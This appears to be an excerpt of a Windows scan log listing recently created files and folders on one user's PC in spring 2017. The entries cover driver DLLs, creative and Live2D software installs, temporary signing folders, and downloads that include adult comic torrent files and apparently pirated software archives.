2017-04-15 02:34 - 2012-01-30 09:13 - 00836544 _____ (TOSHIBA Corporation) C:\Windows\system32\tadefxapo264.dll
2017-04-15 02:34 - 2012-01-10 07:50 - 00065944 _____ (TOSHIBA CORPORATION.) C:\Windows\system32\tepeqapo64.dll
2017-04-15 02:34 - 2011-08-23 14:30 - 00603984 _____ (Knowles Acoustics ) C:\Windows\system32\KAAPORT64.dll
2017-04-15 02:34 - 2011-03-17 09:47 - 01361336 _____ (TOSHIBA Corporation) C:\Windows\system32\tosade.dll
2017-04-15 02:34 - 2011-03-07 14:41 - 00148416 _____ (TOSHIBA Corporation) C:\Windows\system32\tadefxapo.dll
2017-04-14 16:31 - 2017-04-14 16:31 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigncf53cef93ad9bae9
2017-04-14 16:31 - 2017-04-14 16:31 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignc4d015efff19860d
2017-04-14 16:31 - 2017-04-14 16:31 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign010f9e2675df4aa4
2017-04-14 02:46 - 2017-04-14 02:46 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Rocket_League_Customizer
2017-04-13 16:52 - 2017-04-13 16:52 - 00000000 ____D C:\Windows\SysWOW64\directx
2017-04-13 16:31 - 2017-04-22 01:07 - 00000000 ____D C:\Users\Mehrad\Desktop\Laughing
2017-04-13 03:14 - 2017-04-13 03:14 - 00008574 _____ C:\Users\Mehrad\Downloads\[Mist Night] Operation Vore Comic (Vividred Operation).torrent
2017-04-13 03:13 - 2017-04-13 03:13 - 00007192 _____ C:\Users\Mehrad\Downloads\[Sanbaizu] Oba-san no Toile o Shita kara Nozoku [English] [Brolen].torrent
2017-04-13 03:13 - 2017-04-13 03:13 - 00004512 _____ C:\Users\Mehrad\Downloads\[G-Panda (Midou Tsukasa)] Chijoi Aoi Haruka no Ganki Chiryoushitsu [Chinese] [瓜皮汉化] [Digital].torrent
2017-04-13 03:00 - 2017-04-13 03:00 - 00007944 _____ C:\Users\Mehrad\Downloads\[Motsu Ryouri (Motsu)] Yamada Palace (Persona 5).torrent
2017-04-13 02:57 - 2017-04-13 02:57 - 00492457 _____ C:\Users\Mehrad\Desktop\Twitter web player.mp4
2017-04-12 23:55 - 2017-04-12 23:55 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign13e346a7ebe090d3
2017-04-12 03:22 - 2017-04-12 03:39 - 05972799 _____ C:\Users\Mehrad\Desktop\Laugh and the world laughs with you, cry and you will cry alone.psd
2017-04-12 03:11 - 2017-04-12 03:11 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign7ee1a56481bbad2d
2017-04-12 03:10 - 2017-04-12 03:10 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign21f13a9ce91078a1
2017-04-12 02:29 - 2017-04-12 02:29 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign7707ef940d1b5230
2017-04-12 01:25 - 2017-04-12 01:25 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign54c75860372f8c29
2017-04-11 23:49 - 2017-04-11 23:49 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign7871b84b416a3dae
2017-04-11 23:44 - 2017-04-11 23:44 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign3ab05a7b6727a03a
2017-04-11 23:21 - 2017-04-11 23:21 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign32a58fd20b0c3428
2017-04-11 23:20 - 2017-04-11 23:20 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignda5ba451a5ec87d3
2017-04-11 22:33 - 2017-04-11 22:33 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign32e348aa49d9943d
2017-04-11 22:32 - 2017-04-11 22:32 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign42ccbf89db9c407d
2017-04-11 20:18 - 2017-04-11 20:18 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign23729dd46f7688af
2017-04-11 19:13 - 2017-04-11 19:13 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigna81ed03153c76ad8
2017-04-10 22:02 - 2017-04-10 22:02 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign52cd15f40825fd13
2017-04-10 07:23 - 2017-04-10 07:23 - 00015895 _____ C:\Users\Mehrad\Downloads\(C91) [Z.A.P. (Zucchini)] Yonjyouhan x Monogatari Nijoume [Chinese] [无毒汉化组].torrent
2017-04-10 07:23 - 2017-04-10 07:23 - 00014545 _____ C:\Users\Mehrad\Downloads\[Zucchini] Fudousan Monogatari -Iwakutsuki Bukken Hen- _ Real Estate Story -Property with a Past Chapter- (COMIC Mugen Tensei 2015-12) [English] [N04h].torrent
2017-04-10 07:22 - 2017-04-10 07:22 - 00007697 _____ C:\Users\Mehrad\Downloads\[Hiru Okita] Ongaeshi _ On Gratitude (COMIC Masyo 2015-07) [English] [wehasband].torrent
2017-04-10 07:22 - 2017-04-10 07:22 - 00006612 _____ C:\Users\Mehrad\Downloads\[Hiru Okita] Toshoshitsu no Sensei _ Library Teacher (COMIC Masyo 2013-06) [English] [Dash-Dash].torrent
2017-04-10 07:15 - 2017-04-10 07:15 - 00047907 _____ C:\Users\Mehrad\Downloads\[ShindoLA] EMERGENCE (Complete) [English].torrent
2017-04-10 06:55 - 2017-04-10 06:55 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign07a3dc3a55995263
2017-04-10 05:41 - 2017-04-10 05:41 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign58c8111006bb801e
2017-04-10 05:08 - 2017-04-10 05:08 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign687ceb0877573d8f
2017-04-10 05:06 - 2017-04-10 05:06 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignbecc2710f0f7cddc
2017-04-10 05:04 - 2017-04-10 05:04 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign11bad7a14ac2a781
2017-04-10 04:35 - 2017-04-10 04:35 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigncbb1b639166f5c91
2017-04-10 01:58 - 2017-04-10 06:54 - 26740319 _____ C:\Users\Mehrad\Desktop\Untitled-23.psd
2017-04-10 01:49 - 2017-04-10 01:49 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign72e2eea57b3634b3
2017-04-10 01:28 - 2017-04-10 01:28 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignbc9e100558747066
2017-04-09 22:08 - 2017-04-09 22:08 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign5aafd990bd4a87ed
2017-04-09 19:29 - 2017-04-09 19:29 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignb1b8585e6e2d245b
2017-04-09 18:54 - 2017-04-09 18:54 - 00003170 _____ C:\Windows\System32\Tasks\{4418A03D-888A-4AA1-899E-6C2D8D7927D3}
2017-04-09 14:08 - 2017-04-09 14:08 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign578e8c5f85b6035d
2017-04-09 14:04 - 2017-04-09 14:04 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignbc1354330205b777
2017-04-09 13:57 - 2017-04-09 13:57 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignccfdad460bb1e595
2017-04-09 13:46 - 2017-04-09 13:46 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign5cca455a2c0793c3
2017-04-09 13:36 - 2017-04-09 13:36 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign7e23eaa1ac9d0fa2
2017-04-09 12:48 - 2017-04-09 12:48 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign44dda19c160a99e2
2017-04-09 12:44 - 2017-04-09 12:44 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignca6413006bfc8dd3
2017-04-09 12:44 - 2017-04-09 12:44 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign9ab53d04d129e11f
2017-04-08 17:21 - 2017-04-08 17:21 - 00001194 _____ C:\Users\Mehrad\Desktop\Play Barnyard.lnk
2017-04-08 17:20 - 2017-04-08 17:20 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\THQ
2017-04-08 15:44 - 2017-04-08 15:44 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign5d8a4dc9796d0aa7
2017-04-08 01:34 - 2017-04-08 01:34 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign0632aa3bf80920a1
2017-04-07 21:04 - 2017-04-07 21:04 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign826f42a783d40149
2017-04-07 21:02 - 2017-04-07 21:02 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigna03370122a755796
2017-04-07 17:15 - 2017-04-07 17:15 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignc7e0ecb8b3cda217
2017-04-07 14:48 - 2017-04-07 14:48 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignbc1717ae5e631dc0
2017-04-06 14:36 - 2017-04-06 14:36 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignf613faf288a31005
2017-04-06 13:28 - 2017-04-06 13:28 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign93f9459a07aaa188
2017-04-06 13:11 - 2017-04-06 13:11 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignfad34c4775b3b956
2017-04-06 12:37 - 2017-04-06 12:37 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign106f4c7b79d4ee19
2017-04-06 03:03 - 2017-04-06 03:03 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign9594f5f0821290fb
2017-04-06 02:51 - 2017-04-06 02:51 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign8ac0fd46b7fc09e0
2017-04-06 02:44 - 2017-04-06 02:44 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign7e5a07de4c289514
2017-04-06 02:40 - 2017-04-06 02:40 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign0fa138aaaf4aeb10
2017-04-06 02:34 - 2017-04-06 02:34 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign1e4f54fc1e471271
2017-04-06 02:29 - 2017-04-06 02:29 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign03ee2be61b3dd5ca
2017-04-06 01:53 - 2017-04-06 01:53 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign3d48e50d6f5c8f85
2017-04-05 23:35 - 2017-04-05 23:35 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign97771f2bc7bccd22
2017-04-05 20:06 - 2017-04-05 20:06 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign4c59adf9a14e488a
2017-04-05 19:26 - 2017-04-05 19:26 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignbd45d5368e511081
2017-04-05 17:48 - 2017-04-05 17:48 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignce16fd9e50cb6ccb
2017-04-05 17:38 - 2017-04-05 17:38 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign18d80977a8432fea
2017-04-05 16:52 - 2017-04-05 16:52 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign72dadd3f30002c33
2017-04-05 16:27 - 2017-04-05 19:15 - 14335360 _____ C:\Users\Mehrad\Desktop\w5e.psd
2017-04-05 15:50 - 2017-04-05 15:50 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign855bde8dbe2b6dcc
2017-04-05 15:49 - 2017-04-05 15:49 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign03b7ada127f0acc1
2017-04-05 15:35 - 2017-04-05 15:35 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigna37b4dae7079be37
2017-04-05 15:35 - 2017-04-05 15:35 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign5f2f72253850c5e7
2017-04-05 11:25 - 2017-04-24 00:36 - 24339216 _____ C:\Users\Mehrad\Desktop\w1e.psd
2017-04-05 11:03 - 2017-04-05 11:03 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign1a7bb5c2133c4d63
2017-04-05 07:01 - 2017-04-05 07:01 - 00732368 _____ (COMODO) C:\Windows\SysWOW64\guard32.dll
2017-04-05 07:01 - 2017-04-05 07:01 - 00051808 _____ (COMODO) C:\Windows\system32\cmdcsr.dll
2017-04-05 07:00 - 2017-04-05 07:00 - 00941768 _____ (COMODO) C:\Windows\system32\guard64.dll
2017-04-05 06:58 - 2017-04-05 06:58 - 00457408 _____ (COMODO) C:\Windows\system32\cmdvrt64.dll
2017-04-05 06:58 - 2017-04-05 06:58 - 00230592 _____ (COMODO) C:\Windows\system32\cmdshim64.dll
2017-04-05 06:56 - 2017-04-05 06:56 - 00363200 _____ (COMODO) C:\Windows\SysWOW64\cmdvrt32.dll
2017-04-05 06:56 - 2017-04-05 06:56 - 00194752 _____ (COMODO) C:\Windows\SysWOW64\cmdshim32.dll
2017-04-05 00:07 - 2017-04-05 00:07 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign8a69f58b75c73eda
2017-04-04 23:35 - 2017-04-04 23:35 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigna1cce3ee5f5f437b
2017-04-04 21:46 - 2017-04-04 21:46 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign71426cda50b5e931
2017-04-04 21:22 - 2017-04-04 21:22 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignb23b21d88fbfe5c6
2017-04-04 21:10 - 2017-04-04 21:10 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign896526935d7c1bd0
2017-04-04 20:09 - 2017-04-04 20:09 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign7cd5c23e558473a5
2017-04-04 19:56 - 2017-04-04 19:56 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign27c8585eadc151a6
2017-04-04 18:09 - 2017-04-04 18:09 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign54d4947696dd1aad
2017-04-04 17:44 - 2017-04-04 17:44 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign3749302071eefb98
2017-04-04 17:39 - 2017-04-04 17:39 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign0a74614b38037745
2017-04-04 17:36 - 2017-04-04 17:36 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigndf0cd72754c872b1
2017-04-04 17:29 - 2017-04-04 17:29 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign272e2b35352a25e3
2017-04-04 17:29 - 2017-04-04 17:29 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign15abd8f9210845c0
2017-04-04 12:18 - 2017-04-04 12:18 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigna2a60c9b9a3d459b
2017-04-04 12:16 - 2017-04-04 12:29 - 68470266 _____ C:\Users\Mehrad\Downloads\Autodesk-SketchBook-3.7.2(www.farsroid.com)_2.apk
2017-04-04 11:13 - 2017-04-04 11:13 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign9c21f4f7bc5a88db
2017-04-04 06:22 - 2017-04-04 06:22 - 00416891 _____ C:\Users\Mehrad\Downloads\susie347b.lzh
2017-04-03 18:35 - 2017-04-03 18:35 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign0c0ab502156a0c54
2017-04-03 18:09 - 2017-04-03 18:09 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign5445dfb913c4779c
2017-04-03 00:02 - 2017-04-03 00:02 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign8cf4eff41f8b82ac
2017-04-02 23:41 - 2017-04-02 23:41 - 00000778 _____ C:\Users\Mehrad\Desktop\Dexpot.lnk
2017-04-02 23:41 - 2017-04-02 23:41 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dexpot
2017-04-02 23:41 - 2017-04-02 23:41 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\Dexpot
2017-04-02 23:41 - 2017-04-02 23:41 - 00000000 ____D C:\Program Files (x86)\Dexpot
2017-04-02 23:25 - 2017-04-02 23:25 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigna7fc04d3dce479ca
2017-04-02 23:14 - 2017-04-02 23:14 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignd0ece1f3bab9e537
2017-04-02 22:24 - 2017-04-02 22:24 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign1c27f5fe6be3924a
2017-04-02 22:21 - 2017-04-02 22:21 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign4cbcfb4d8db336a1
2017-04-02 20:19 - 2017-04-05 09:39 - 10268543 _____ C:\Users\Mehrad\Desktop\we.psd
2017-04-02 19:49 - 2017-04-02 19:49 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigna59618e394b26a2e
2017-04-02 18:38 - 2017-04-02 18:38 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsignfd9e78c8dbf88995
2017-04-02 17:58 - 2017-04-02 17:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dragon UnPACKer 5
2017-04-02 17:58 - 2017-04-02 17:58 - 00000000 ____D C:\Program Files (x86)\Dragon UnPACKer 5
2017-04-02 17:52 - 2017-04-21 16:46 - 00001750 _____ C:\Users\Mehrad\Desktop\XnConvert.lnk
2017-04-02 17:52 - 2017-04-02 17:53 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\XnConvert
2017-04-02 17:52 - 2017-04-02 17:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XnConvert
2017-04-02 17:52 - 2017-04-02 17:52 - 00000000 ____D C:\Program Files\XnConvert
2017-04-02 17:45 - 2017-04-02 17:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 2.7
2017-04-02 17:45 - 2017-04-02 17:45 - 00000000 ____D C:\Python27
2017-04-02 17:19 - 2017-04-02 17:19 - 00257780 _____ C:\Users\Mehrad\Downloads\Kogado_pak_amlist.zip
2017-04-02 11:29 - 2017-04-02 11:29 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip
2017-04-02 11:29 - 2017-04-02 11:29 - 00000000 ____D C:\Program Files\7-Zip
2017-04-02 11:09 - 2017-04-02 11:10 - 00021057 _____ C:\Users\Mehrad\Downloads\Carnevore.py
2017-04-02 10:24 - 2017-04-02 17:22 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Smith Micro
2017-04-02 10:24 - 2017-04-02 10:24 - 00000000 ____D C:\Users\Mehrad\Documents\My Archives
2017-04-02 10:24 - 2017-04-02 10:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StuffIt 12
2017-04-02 10:24 - 2017-04-02 10:24 - 00000000 ____D C:\Program Files (x86)\Smith Micro
2017-04-02 09:59 - 2017-04-02 09:59 - 00001942 _____ C:\Users\Mehrad\Desktop\PAK Explorer.lnk
2017-04-02 09:59 - 2017-04-02 09:59 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BZ2 - Forgotten Enemies
2017-04-02 09:59 - 2017-04-02 09:59 - 00000000 ____D C:\Program Files (x86)\PAK Explorer
2017-04-02 09:51 - 2017-04-02 09:51 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\MultiExtractor
2017-04-02 09:51 - 2017-04-02 09:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MultiExtractor
2017-04-02 09:51 - 2017-04-02 09:51 - 00000000 ____D C:\Program Files (x86)\MultiExtractor
2017-04-02 08:54 - 2017-04-02 08:54 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign72a2aca62e49551d
2017-04-02 08:48 - 2017-04-02 08:49 - 02856307 _____ C:\Users\Mehrad\Downloads\com.google.android.apps.unveil.apk
2017-04-02 08:47 - 2017-04-02 08:52 - 23450947 _____ C:\Users\Mehrad\Downloads\co.kr.generic.ocr_jpn.apk
2017-04-02 08:16 - 2017-04-02 08:16 - 00000725 _____ C:\Users\Public\Desktop\メイドさんとボイン魂.lnk
2017-04-02 08:16 - 2017-04-02 08:16 - 00000725 _____ C:\ProgramData\Desktop\メイドさんとボイン魂.lnk
2017-04-02 08:16 - 2017-04-02 08:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\
2017-04-02 08:15 - 2017-04-02 08:15 - 00000000 ____D C:\
2017-04-01 23:26 - 2017-04-01 23:26 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigneb9b24c893d1cc90
2017-04-01 23:26 - 2017-04-01 23:26 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign58f4f723d58126e3
2017-04-01 23:14 - 2017-04-01 23:14 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign22e4d8a78cd85559
2017-04-01 22:56 - 2017-04-01 22:56 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsign20319a9122677e33
2017-04-01 20:02 - 2017-04-01 20:02 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigne20ffdfe1b2cf512
2017-04-01 18:55 - 2017-04-01 18:55 - 00000948 ____H C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-01 18:55 - 2017-04-01 18:55 - 00000936 ____H C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-04-01 18:55 - 2017-04-01 18:55 - 00000936 ____H C:\ProgramData\Desktop\Mozilla Firefox.lnk
2017-04-01 18:12 - 2017-04-01 18:14 - 07075313 _____ C:\Users\Mehrad\Downloads\IDM.6.28.5.Retail_YasDL.com (2).rar
2017-04-01 17:56 - 2017-04-01 17:59 - 04300286 _____ C:\Users\Mehrad\Downloads\Adobe.Flash.Player.25.00.127.Firefox_YasDL.com.rar.part
2017-04-01 16:08 - 2017-04-18 00:28 - 00000000 ____D C:\Live2D_Cache
2017-04-01 09:22 - 2017-04-12 07:29 - 00003506 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4257933716-793472738-408171945-1001UA
2017-04-01 09:22 - 2017-04-12 07:29 - 00003234 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4257933716-793472738-408171945-1001Core
2017-03-31 20:01 - 2017-04-20 01:39 - 00000000 ____D C:\Users\Mehrad\Documents\0
2017-03-31 17:22 - 2017-03-31 17:22 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Tempzxpsigne25e4a85031f0002
2017-03-31 16:17 - 2017-03-31 16:49 - 140649923 _____ C:\Users\Mehrad\Desktop\Fire Emblem If Live2D Assets.rar
2017-03-31 16:09 - 2017-04-24 16:35 - 00000000 ____D C:\Users\Mehrad\Documents\MEGAsync Downloads
2017-03-31 16:09 - 2017-03-31 16:09 - 00001063 _____ C:\Users\Mehrad\Desktop\MEGAsync.lnk
2017-03-31 16:09 - 2017-03-31 16:09 - 00000000 ___RD C:\Users\Mehrad\Documents\MEGAsync
2017-03-31 16:09 - 2017-03-31 16:09 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MEGAsync
2017-03-31 16:09 - 2017-03-31 16:09 - 00000000 ____D C:\Users\Mehrad\AppData\Local\MEGAsync
2017-03-31 16:09 - 2017-03-31 16:09 - 00000000 ____D C:\Users\Mehrad\AppData\Local\Mega Limited
2017-03-31 16:05 - 2017-03-31 16:07 - 13286592 _____ (MEGA Limited) C:\Users\Mehrad\Downloads\MEGAsyncSetup.exe
2017-03-31 16:03 - 2017-03-31 16:03 - 00000945 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Live2D Viewer.lnk
2017-03-31 16:03 - 2017-03-31 16:03 - 00000933 _____ C:\Users\Public\Desktop\Live2D Viewer.lnk
2017-03-31 16:03 - 2017-03-31 16:03 - 00000933 _____ C:\ProgramData\Desktop\Live2D Viewer.lnk
2017-03-31 16:03 - 2017-03-31 16:03 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\Live2DViewer
2017-03-31 16:03 - 2017-03-31 16:03 - 00000000 ____D C:\Program Files (x86)\Live2D Viewer
2017-03-31 16:01 - 2017-03-31 16:02 - 07933123 _____ C:\Users\Mehrad\Downloads\Live2DViewer2.2.10.air
2017-03-31 15:41 - 2017-03-31 15:48 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\Cybernoids
2017-03-31 15:41 - 2017-03-31 15:48 - 00000000 ____D C:\Users\Mehrad\.oracle_jre_usage
2017-03-31 15:41 - 2017-03-31 15:41 - 00001186 _____ C:\Users\Public\Desktop\Live2D Cubism Animator 2.1_64.lnk
2017-03-31 15:41 - 2017-03-31 15:41 - 00001186 _____ C:\Users\Public\Desktop\Live2D Cubism Animator 2.1_32.lnk
2017-03-31 15:41 - 2017-03-31 15:41 - 00001186 _____ C:\ProgramData\Desktop\Live2D Cubism Animator 2.1_64.lnk
2017-03-31 15:41 - 2017-03-31 15:41 - 00001186 _____ C:\ProgramData\Desktop\Live2D Cubism Animator 2.1_32.lnk
2017-03-31 15:41 - 2017-03-31 15:41 - 00001181 _____ C:\Users\Public\Desktop\Live2D Cubism Modeler 2.1_64.lnk
2017-03-31 15:41 - 2017-03-31 15:41 - 00001181 _____ C:\Users\Public\Desktop\Live2D Cubism Modeler 2.1_32.lnk
2017-03-31 15:41 - 2017-03-31 15:41 - 00001181 _____ C:\ProgramData\Desktop\Live2D Cubism Modeler 2.1_64.lnk
2017-03-31 15:41 - 2017-03-31 15:41 - 00001181 _____ C:\ProgramData\Desktop\Live2D Cubism Modeler 2.1_32.lnk
2017-03-31 15:41 - 2017-03-31 15:41 - 00000000 ____D C:\ProgramData\Reprise
2017-03-31 15:41 - 2017-03-31 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Live2D Cubism 2.1
2017-03-31 15:41 - 2017-03-31 15:41 - 00000000 ____D C:\ProgramData\Live2D
2017-03-31 15:41 - 2017-03-31 15:41 - 00000000 ____D C:\Program Files (x86)\Live2D Cubism 2.1
2017-03-31 15:13 - 2017-03-31 15:13 - 01969444 _____ C:\Users\Mehrad\Downloads\Live2DViewer2.1.0.air
2017-03-31 15:12 - 2017-03-31 15:12 - 00001075 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe AIR Settings Manager.lnk
2017-03-31 15:12 - 2017-03-31 15:12 - 00001063 _____ C:\Users\Public\Desktop\Adobe AIR Settings Manager.lnk
2017-03-31 15:12 - 2017-03-31 15:12 - 00001063 _____ C:\ProgramData\Desktop\Adobe AIR Settings Manager.lnk
2017-03-31 15:12 - 2017-03-31 15:12 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\com.adobe.air.settings.manager.419D633A757E8B26DD2BDB301927BA7BA7490F38.1
2017-03-31 15:12 - 2017-03-31 15:12 - 00000000 ____D C:\Users\Mehrad\AppData\Roaming\com.adobe.air.settings.manager
2017-03-31 15:12 - 2017-03-31 15:12 - 00000000 ____D C:\Program Files (x86)\Adobe AIR Settings Manager
2017-03-31 15:10 - 2017-03-31 15:10 - 00390148 _____ C:\Users\Mehrad\Downloads\SettingsManager.air
2017-03-31 15:02 - 2017-03-31 15:04 - 10906744 _____ (Adobe Systems Inc.) C:\Users\Mehrad\Downloads\AdobeAIRInstaller.exe
2017-03-31 14:53 - 2017-03-31 14:53 - 00000000 ____D C:\Users\Default\AppData\Roaming\Macromedia
2017-03-31 14:53 - 2017-03-31 14:53 - 00000000 ____D C:\Users\Default User\AppData\Roaming\Macromedia
2017-03-31 14:47 - 2017-03-31 17:19 - 00000000 ____D C:\Users\Mehrad\Desktop\Live 2D
2017-03-31 14:45 - 2017-03-31 14:45 - 00000641 _____ C:\Users\Mehrad\Downloads\fire_emblem_desktop_waifu_links.txt
2017-03-31 09:55 - 2017-03-31 09:55 - 00009780 _____ C:\Users\Mehrad\Downloads\[Doronuma Kyoudai (RED-RUM)] Futa Ona Dai Ni Shou _ A Certain Futanari Girl's Masturbation Diary Ch.2_ FutaOna 2 [English] [2d-market.com] [Decensored] [Digital].torrent
2017-03-31 09:55 - 2017-03-31 09:55 - 00007818 _____ C:\Users\Mehrad\Downloads\[Doronuma Kyoudai (RED-RUM)] Futa Ona Joshou _ A Certain Futanari Girl's Masturbation Diary Ch.1 - FutaOna Introduction Chapter [English] [2d-market.com] [Decensored] [Digital].torrent
